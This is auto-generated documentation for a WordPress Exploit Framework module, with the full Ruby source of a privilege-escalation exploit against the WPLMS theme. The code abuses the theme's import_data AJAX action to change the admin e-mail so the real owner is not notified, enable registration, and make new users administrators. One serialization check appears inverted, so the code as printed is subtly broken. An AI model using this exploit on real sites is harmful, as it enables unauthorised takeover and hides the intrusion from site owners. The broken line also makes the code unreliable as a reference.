Class: Wpxf::Auxiliary::WplmsPrivilegeEscalation
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login
- Defined in:
- lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
-
#initialize ⇒ WplmsPrivilegeEscalation
constructor
A new instance of WplmsPrivilegeEscalation.
- #php_serialize(value) ⇒ Object
- #requires_authentication ⇒ Object
- #run ⇒ Object
- #serialize_and_encode(value) ⇒ Object
- #set_wp_option(name, value) ⇒ Object
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ WplmsPrivilegeEscalation
Returns a new instance of WplmsPrivilegeEscalation.
10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 10 def initialize super update_info( name: 'WPLMS Theme Privilege Escalation', desc: %( The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an authenticated user of any user level to set any system option due to a lack of validation in the import_data function of /includes/func.php. The module first changes the admin e-mail address to prevent any notifications being sent to the actual administrator during the attack, re-enables user registration in case it has been disabled and sets the default role to be administrator. This will allow for the user to create a new account with admin privileges via the default registration page found at /wp-login.php?action=register. ), desc_preformatted: true, author: [ 'Evex', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['WPVDB', '7785'] ], date: 'Feb 09 2015' ) end |
Instance Method Details
#check ⇒ Object
41 42 43 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 41 def check check_theme_version_from_readme('wplms', '1.8.4.2', '1.5.2') end |
#php_serialize(value) ⇒ Object
49 50 51 52 53 54 55 56 57 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 49 def php_serialize(value) # Only strings and numbers are required by this module case value when String, Symbol "s:#{value.bytesize}:\"#{value}\";" when Integer "i:#{value};" end end |
#requires_authentication ⇒ Object
45 46 47 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 45 def requires_authentication true end |
#run ⇒ Object
89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 89 def run return false unless super new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com" emit_info "Changing admin e-mail address to #{new_email}..." if set_wp_option('admin_email', new_email).nil? emit_error 'Failed to change the admin e-mail address' return false end emit_info 'Enabling user registrations...' if set_wp_option('users_can_register', 1).nil? emit_error 'Failed to enable user registrations' return false end emit_info 'Setting the default user role...' if set_wp_option('default_role', 'administrator').nil? emit_error 'Failed to set the default user role' return false end register_url = normalize_uri(full_uri, 'wp-login.php?action=register') emit_success 'Privilege escalation complete' emit_success "Create a new account at #{register_url} to gain admin access." true end |
#serialize_and_encode(value) ⇒ Object
59 60 61 62 63 64 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 59 def serialize_and_encode(value) serialized_value = php_serialize(value) return nil unless serialized_value.nil? Base64.strict_encode64(serialized_value) end |
#set_wp_option(name, value) ⇒ Object
66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 66 def set_wp_option(name, value) encoded_value = serialize_and_encode(value) if encoded_value.nil? emit_error "Failed to serialize #{value}", true return nil end res = execute_post_request( url: wordpress_url_admin_ajax, params: { 'action' => 'import_data' }, body: { 'name' => name, 'code' => encoded_value }, cookie: ) if res.nil? emit_error 'No response from the target', true elsif res.code != 200 emit_warning "Server responded with code #{res.code}", true end res end |